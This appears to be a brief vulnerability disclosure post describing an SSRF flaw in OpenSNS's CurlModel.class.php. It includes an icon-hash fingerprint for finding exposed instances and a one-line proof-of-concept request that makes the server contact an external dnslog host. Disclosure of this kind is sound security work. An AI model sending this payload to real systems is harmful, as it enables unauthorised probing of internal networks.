Opensns Curlmodel Class Php Ssrf Vulnerability
Opensns Curlmodel Class Php Ssrf Vulnerability
OpenSNS CurlModel.class.php SSRF vulnerability
Vulnerability Description
There is an SSRF vulnerability in the curl method in the OpenSNS CurlModel.class.php file. The vulnerability attacker can detect intranet information.
Vulnerability Impact
OpenSNS
Network surveying and mapping
icon_hash=”1167011145”
Vulnerability reappears
The login page is as follows
The vulnerable file is Application/Admin/Model/CurlModel.class.php
Construct POC
1
/?s=weibo/share/shareBox&query=app=Admin%26model=Curl%26method=curl%26id=https://92aq2z.dnslog.cn
This post is licensed under CC BY 4.0 by the author.